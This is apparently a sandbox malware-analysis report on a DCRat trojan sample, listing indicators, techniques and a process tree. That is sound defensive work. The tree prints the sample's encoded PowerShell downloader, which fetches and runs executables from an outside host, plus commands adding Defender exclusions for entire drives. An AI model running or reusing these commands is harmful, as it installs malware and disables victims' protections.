dcrat | 52451fc280787400dff271b002fc1e4936fff793a89d2b570de8cd1ac711fa88

Analysis

max time kernel
151s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
20/09/2022, 09:01

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

VenoxLauncher.exe
Size

9KB
MD5

6e683d499e23e6363c3c1abed1eb2e62
SHA1

6352d4c792df5496dfcfbf5f6c41a2bc9942ada2
SHA256

52451fc280787400dff271b002fc1e4936fff793a89d2b570de8cd1ac711fa88
SHA512

7ef4d2c326618d757c7d5a002f514234d988b3c568774b9da0891e5e8653b8d062a77146a2d311ee68e9a782b35765f83cb0284ed92514328fd0f1504043bb89
SSDEEP

192:F9yzVjA8xdmX4EvXYqLDRS8Uq9p3el7/+cvkLhNtUqCvY9vkn1dD:F9yBk4C4sLLDRS8/CXkdNt/KYFknTD

Score

10^/10

dcrat evasion infostealer rat spyware stealer

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe

Process spawned unexpected child process 27 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4088	3572	schtasks.exe	20
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3868	3572	schtasks.exe	20
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1884	3572	schtasks.exe	20
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1984	3572	schtasks.exe	20
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3656	3572	schtasks.exe	20
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	460	3572	schtasks.exe	20
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2600	3572	schtasks.exe	20
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2036	3572	schtasks.exe	20
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3464	3572	schtasks.exe	20
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4728	3572	schtasks.exe	20
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4724	3572	schtasks.exe	20
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4380	3572	schtasks.exe	20
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4128	3572	schtasks.exe	20
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3440	3572	schtasks.exe	20
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3380	3572	schtasks.exe	20
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4024	3572	schtasks.exe	20
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5060	3572	schtasks.exe	20
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	456	3572	schtasks.exe	20
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4960	3572	schtasks.exe	20
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4820	3572	schtasks.exe	20
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4800	3572	schtasks.exe	20
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1644	3572	schtasks.exe	20
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1512	3572	schtasks.exe	20
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1888	3572	schtasks.exe	20
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3968	3572	schtasks.exe	20
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3284	3572	schtasks.exe	20
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1080	3572	schtasks.exe	20

DCRat payload 7 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral2/files/0x0008000000022e62-140.dat	dcrat
behavioral2/files/0x0008000000022e62-147.dat	dcrat
behavioral2/files/0x0006000000022e67-153.dat	dcrat
behavioral2/files/0x0006000000022e67-154.dat	dcrat
behavioral2/memory/2604-155-0x0000000000C90000-0x0000000000E5C000-memory.dmp	dcrat
behavioral2/files/0x0006000000022e7f-196.dat	dcrat
behavioral2/files/0x0006000000022e7f-195.dat	dcrat

Blocklisted process makes network request 1 IoCs

flow	pid	Process
5	4012	powershell.exe

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\drivers\etc\hosts	Chrome.exe

Executes dropped EXE 4 IoCs

pid	Process
4376	Surrogate.exe
2344	Chrome.exe
2604	Bridgeruntime.exe
4568	sihost.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	VenoxLauncher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	Surrogate.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	Bridgeruntime.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	sihost.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
18	ipinfo.io
19	ipinfo.io

Drops file in Program Files directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\SppExtComObj.exe	Bridgeruntime.exe
File created	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\e1ef82546f0b02	Bridgeruntime.exe
File created	C:\Program Files\Common Files\microsoft shared\MSInfo\cmd.exe	Bridgeruntime.exe
File created	C:\Program Files\Common Files\microsoft shared\MSInfo\ebf1f9fa8afd6d	Bridgeruntime.exe
File created	C:\Program Files\Google\Chrome\updaterchr.exe	Chrome.exe
File created	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\SppExtComObj.exe	Bridgeruntime.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\fr-FR\wininit.exe	Bridgeruntime.exe
File created	C:\Windows\fr-FR\56085415360792	Bridgeruntime.exe

Launches sc.exe 5 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1568	sc.exe
1556	sc.exe
4884	sc.exe
4276	sc.exe
992	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 27 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1984	schtasks.exe
1512	schtasks.exe
5060	schtasks.exe
4024	schtasks.exe
3656	schtasks.exe
4728	schtasks.exe
3464	schtasks.exe
3440	schtasks.exe
456	schtasks.exe
3868	schtasks.exe
1884	schtasks.exe
2036	schtasks.exe
4960	schtasks.exe
4724	schtasks.exe
4128	schtasks.exe
4380	schtasks.exe
4820	schtasks.exe
3284	schtasks.exe
4088	schtasks.exe
460	schtasks.exe
2600	schtasks.exe
1888	schtasks.exe
3968	schtasks.exe
1080	schtasks.exe
3380	schtasks.exe
4800	schtasks.exe
1644	schtasks.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings	Surrogate.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings	sihost.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4012	powershell.exe
4012	powershell.exe
2252	powershell.exe
2252	powershell.exe
3928	powershell.exe
3928	powershell.exe
2604	Bridgeruntime.exe
2604	Bridgeruntime.exe
2604	Bridgeruntime.exe
2604	Bridgeruntime.exe
2604	Bridgeruntime.exe
4428	powershell.exe
2604	Bridgeruntime.exe
2604	Bridgeruntime.exe
4428	powershell.exe
2604	Bridgeruntime.exe
2604	Bridgeruntime.exe
2604	Bridgeruntime.exe
2604	Bridgeruntime.exe
2604	Bridgeruntime.exe
2604	Bridgeruntime.exe
2604	Bridgeruntime.exe
2604	Bridgeruntime.exe
2604	Bridgeruntime.exe
2604	Bridgeruntime.exe
2604	Bridgeruntime.exe
2604	Bridgeruntime.exe
2604	Bridgeruntime.exe
2604	Bridgeruntime.exe
2604	Bridgeruntime.exe
2604	Bridgeruntime.exe
2604	Bridgeruntime.exe
1924	powershell.exe
2604	Bridgeruntime.exe
2604	Bridgeruntime.exe
2604	Bridgeruntime.exe
3064	powershell.exe
3064	powershell.exe
1624	powershell.exe
1624	powershell.exe
3732	powershell.exe
3732	powershell.exe
1712	powershell.exe
1712	powershell.exe
2440	powershell.exe
2440	powershell.exe
4440	powershell.exe
4440	powershell.exe
4520	powershell.exe
4520	powershell.exe
4476	powershell.exe
4476	powershell.exe
4900	powershell.exe
4900	powershell.exe
4012	powershell.exe
4012	powershell.exe
3136	powershell.exe
3136	powershell.exe
4984	powershell.exe
4984	powershell.exe
4984	powershell.exe
3064	powershell.exe
3064	powershell.exe
1924	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
4568	sihost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4012	powershell.exe
Token: SeDebugPrivilege	2252	powershell.exe
Token: SeDebugPrivilege	2604	Bridgeruntime.exe
Token: SeDebugPrivilege	3928	powershell.exe
Token: SeShutdownPrivilege	1780	powercfg.exe
Token: SeCreatePagefilePrivilege	1780	powercfg.exe
Token: SeDebugPrivilege	4428	powershell.exe
Token: SeShutdownPrivilege	2276	powercfg.exe
Token: SeCreatePagefilePrivilege	2276	powercfg.exe
Token: SeShutdownPrivilege	4124	powercfg.exe
Token: SeCreatePagefilePrivilege	4124	powercfg.exe
Token: SeShutdownPrivilege	2092	powercfg.exe
Token: SeCreatePagefilePrivilege	2092	powercfg.exe
Token: SeIncreaseQuotaPrivilege	4428	powershell.exe
Token: SeSecurityPrivilege	4428	powershell.exe
Token: SeTakeOwnershipPrivilege	4428	powershell.exe
Token: SeLoadDriverPrivilege	4428	powershell.exe
Token: SeSystemProfilePrivilege	4428	powershell.exe
Token: SeSystemtimePrivilege	4428	powershell.exe
Token: SeProfSingleProcessPrivilege	4428	powershell.exe
Token: SeIncBasePriorityPrivilege	4428	powershell.exe
Token: SeCreatePagefilePrivilege	4428	powershell.exe
Token: SeBackupPrivilege	4428	powershell.exe
Token: SeRestorePrivilege	4428	powershell.exe
Token: SeShutdownPrivilege	4428	powershell.exe
Token: SeDebugPrivilege	4428	powershell.exe
Token: SeSystemEnvironmentPrivilege	4428	powershell.exe
Token: SeRemoteShutdownPrivilege	4428	powershell.exe
Token: SeUndockPrivilege	4428	powershell.exe
Token: SeManageVolumePrivilege	4428	powershell.exe
Token: 33	4428	powershell.exe
Token: 34	4428	powershell.exe
Token: 35	4428	powershell.exe
Token: 36	4428	powershell.exe
Token: SeIncreaseQuotaPrivilege	4428	powershell.exe
Token: SeSecurityPrivilege	4428	powershell.exe
Token: SeTakeOwnershipPrivilege	4428	powershell.exe
Token: SeLoadDriverPrivilege	4428	powershell.exe
Token: SeSystemProfilePrivilege	4428	powershell.exe
Token: SeSystemtimePrivilege	4428	powershell.exe
Token: SeProfSingleProcessPrivilege	4428	powershell.exe
Token: SeIncBasePriorityPrivilege	4428	powershell.exe
Token: SeCreatePagefilePrivilege	4428	powershell.exe
Token: SeBackupPrivilege	4428	powershell.exe
Token: SeRestorePrivilege	4428	powershell.exe
Token: SeShutdownPrivilege	4428	powershell.exe
Token: SeDebugPrivilege	4428	powershell.exe
Token: SeSystemEnvironmentPrivilege	4428	powershell.exe
Token: SeRemoteShutdownPrivilege	4428	powershell.exe
Token: SeUndockPrivilege	4428	powershell.exe
Token: SeManageVolumePrivilege	4428	powershell.exe
Token: 33	4428	powershell.exe
Token: 34	4428	powershell.exe
Token: 35	4428	powershell.exe
Token: 36	4428	powershell.exe
Token: SeIncreaseQuotaPrivilege	4428	powershell.exe
Token: SeSecurityPrivilege	4428	powershell.exe
Token: SeTakeOwnershipPrivilege	4428	powershell.exe
Token: SeLoadDriverPrivilege	4428	powershell.exe
Token: SeSystemProfilePrivilege	4428	powershell.exe
Token: SeSystemtimePrivilege	4428	powershell.exe
Token: SeProfSingleProcessPrivilege	4428	powershell.exe
Token: SeIncBasePriorityPrivilege	4428	powershell.exe
Token: SeCreatePagefilePrivilege	4428	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3444 wrote to memory of 4012	3444	VenoxLauncher.exe	80
PID 3444 wrote to memory of 4012	3444	VenoxLauncher.exe	80
PID 4012 wrote to memory of 2252	4012	powershell.exe	82
PID 4012 wrote to memory of 2252	4012	powershell.exe	82
PID 4012 wrote to memory of 4376	4012	powershell.exe	84
PID 4012 wrote to memory of 4376	4012	powershell.exe	84
PID 4012 wrote to memory of 4376	4012	powershell.exe	84
PID 4012 wrote to memory of 2344	4012	powershell.exe	85
PID 4012 wrote to memory of 2344	4012	powershell.exe	85
PID 4376 wrote to memory of 1960	4376	Surrogate.exe	86
PID 4376 wrote to memory of 1960	4376	Surrogate.exe	86
PID 4376 wrote to memory of 1960	4376	Surrogate.exe	86
PID 1960 wrote to memory of 4980	1960	WScript.exe	87
PID 1960 wrote to memory of 4980	1960	WScript.exe	87
PID 1960 wrote to memory of 4980	1960	WScript.exe	87
PID 4980 wrote to memory of 2604	4980	cmd.exe	89
PID 4980 wrote to memory of 2604	4980	cmd.exe	89
PID 2344 wrote to memory of 3928	2344	Chrome.exe	92
PID 2344 wrote to memory of 3928	2344	Chrome.exe	92
PID 2344 wrote to memory of 4836	2344	Chrome.exe	94
PID 2344 wrote to memory of 4836	2344	Chrome.exe	94
PID 2344 wrote to memory of 1540	2344	Chrome.exe	96
PID 2344 wrote to memory of 1540	2344	Chrome.exe	96
PID 2344 wrote to memory of 4428	2344	Chrome.exe	98
PID 2344 wrote to memory of 4428	2344	Chrome.exe	98
PID 1540 wrote to memory of 1780	1540	cmd.exe	101
PID 1540 wrote to memory of 1780	1540	cmd.exe	101
PID 4836 wrote to memory of 1568	4836	cmd.exe	100
PID 4836 wrote to memory of 1568	4836	cmd.exe	100
PID 1540 wrote to memory of 2276	1540	cmd.exe	103
PID 1540 wrote to memory of 2276	1540	cmd.exe	103
PID 4836 wrote to memory of 1556	4836	cmd.exe	104
PID 4836 wrote to memory of 1556	4836	cmd.exe	104
PID 4836 wrote to memory of 4884	4836	cmd.exe	108
PID 4836 wrote to memory of 4884	4836	cmd.exe	108
PID 1540 wrote to memory of 4124	1540	cmd.exe	106
PID 1540 wrote to memory of 4124	1540	cmd.exe	106
PID 1540 wrote to memory of 2092	1540	cmd.exe	109
PID 1540 wrote to memory of 2092	1540	cmd.exe	109
PID 4836 wrote to memory of 4276	4836	cmd.exe	111
PID 4836 wrote to memory of 4276	4836	cmd.exe	111
PID 4836 wrote to memory of 992	4836	cmd.exe	112
PID 4836 wrote to memory of 992	4836	cmd.exe	112
PID 4836 wrote to memory of 3600	4836	cmd.exe	113
PID 4836 wrote to memory of 3600	4836	cmd.exe	113
PID 4836 wrote to memory of 2608	4836	cmd.exe	116
PID 4836 wrote to memory of 2608	4836	cmd.exe	116
PID 4836 wrote to memory of 3456	4836	cmd.exe	117
PID 4836 wrote to memory of 3456	4836	cmd.exe	117
PID 4836 wrote to memory of 1032	4836	cmd.exe	119
PID 4836 wrote to memory of 1032	4836	cmd.exe	119
PID 4836 wrote to memory of 1516	4836	cmd.exe	120
PID 4836 wrote to memory of 1516	4836	cmd.exe	120
PID 2604 wrote to memory of 1924	2604	Bridgeruntime.exe	141
PID 2604 wrote to memory of 1924	2604	Bridgeruntime.exe	141
PID 2604 wrote to memory of 3064	2604	Bridgeruntime.exe	142
PID 2604 wrote to memory of 3064	2604	Bridgeruntime.exe	142
PID 2604 wrote to memory of 1624	2604	Bridgeruntime.exe	144
PID 2604 wrote to memory of 1624	2604	Bridgeruntime.exe	144
PID 2604 wrote to memory of 2440	2604	Bridgeruntime.exe	151
PID 2604 wrote to memory of 2440	2604	Bridgeruntime.exe	151
PID 2604 wrote to memory of 3732	2604	Bridgeruntime.exe	147
PID 2604 wrote to memory of 3732	2604	Bridgeruntime.exe	147
PID 2604 wrote to memory of 4440	2604	Bridgeruntime.exe	148

C:\Users\Admin\AppData\Local\Temp\VenoxLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\VenoxLauncher.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3444
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAcgBxACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAG0AZQBiACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUwB0AGEAcgB0AHUAcAAgAEYAYQBpAGwAdQByAGUAIQAgAEUAaQB0AGgAZQByACAAeQBvAHUAcgAgAEEAbgB0AGkAdgBpAHIAdQBzACAAaQBzACAAZQBuAGEAYgBsAGUAZAAsACAAbwByACAAeQBvAHUAIABhAHIAZQAgAHIAdQBuAG4AaQBuAGcAIAB0AGgAaQBzACAAZgByAG8AbQAgAFYATQAvAFYAUABTACEAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHAAcQBrACMAPgA7ACIAOwA8ACMAcQBiAHkAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBoAG0AZQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBkAHUAZAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB6AGsAagAjAD4AOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvAGwAdQBjAGkAZgBlAHIANgAxAC8ANQAyADMAcgBnAHIAZQBiAGIAaAB0AC8AcgBhAHcALwBiADcAYwBjAGIAZgBmADEAYgBkAGIAMAA1ADkAYQA3AGEAMQAwADEAMABlAGEAMAA3ADYAYwA2ADEAZQBjADYAYQBkADQAMgBkAGIAMwBhAC8AcgBvAG8AdAAuAGUAeABlACcALAAgADwAIwB1AGoAdwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHkAdwBkACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGIAZgB6ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAdQByAHIAbwBnAGEAdABlAC4AZQB4AGUAJwApACkAPAAjAGoAegBrACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAaQB0AGIAdQBjAGsAZQB0AC4AbwByAGcALwBsAHUAYwBpAGYAZQByADYAMQAvADUAMgAzAHIAZwByAGUAYgBiAGgAdAAvAHIAYQB3AC8AYgA3AGMAYwBiAGYAZgAxAGIAZABiADAANQA5AGEANwBhADEAMAAxADAAZQBhADAANwA2AGMANgAxAGUAYwA2AGEAZAA0ADIAZABiADMAYQAvAGcAZwBhAGcAYQBnAC4AZQB4AGUAJwAsACAAPAAjAGgAZgBzACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZAB0AGUAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcgB3AG4AIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwBoAHIAbwBtAGUALgBlAHgAZQAnACkAKQA8ACMAbAB2AGcAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcgBkAGIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdgB2ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAdQByAHIAbwBnAGEAdABlAC4AZQB4AGUAJwApADwAIwB2AGYAYgAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBuAG0AYwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAYQBnAGEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwBoAHIAbwBtAGUALgBlAHgAZQAnACkAPAAjAHcAZQBtACMAPgA="
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4012
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#meb#>[System.Windows.Forms.MessageBox]::Show('Startup Failure! Either your Antivirus is enabled, or you are running this from VM/VPS!','','OK','Error')<#pqk#>;
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2252
- - C:\Users\Admin\AppData\Roaming\Surrogate.exe
    "C:\Users\Admin\AppData\Roaming\Surrogate.exe"
    3⤵
    - Executes dropped EXE
    - Checks computer location settings
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:4376
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\componentdrivercrt\nxBoatTP05v4ZJUajUoag6w.vbe"
      4⤵
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:1960
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\componentdrivercrt\ZBinI4WKT41t3dmuG1vLpr.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4980
      - C:\componentdrivercrt\Bridgeruntime.exe
        
        "C:\componentdrivercrt\Bridgeruntime.exe"
        6⤵
        Executes dropped EXE
        Checks computer location settings
        Drops file in Program Files directory
        Drops file in Windows directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2604
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1924
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3064
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/componentdrivercrt/'
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1624
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/odt/'
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3732
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4440
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2440
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4476
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4900
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1712
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4520
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3136
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4012
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4984
        
        C:\Users\Admin\Local Settings\sihost.exe
        
        "C:\Users\Admin\Local Settings\sihost.exe"
        7⤵
        Executes dropped EXE
        Checks computer location settings
        Modifies registry class
        Suspicious behavior: GetForegroundWindowSpam
        
        PID:4568
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\43d48b04-cfd2-48e8-8a35-6a3da54393dd.vbs"
        8⤵
        
        PID:2116
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\50362a41-827c-48d9-a6cc-56aedcc14b1a.vbs"
        8⤵
        
        PID:2144
- - C:\Users\Admin\AppData\Roaming\Chrome.exe
    "C:\Users\Admin\AppData\Roaming\Chrome.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Drops file in Program Files directory
    - Suspicious use of WriteProcessMemory
    PID:2344
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3928
  - - C:\Windows\SYSTEM32\cmd.exe
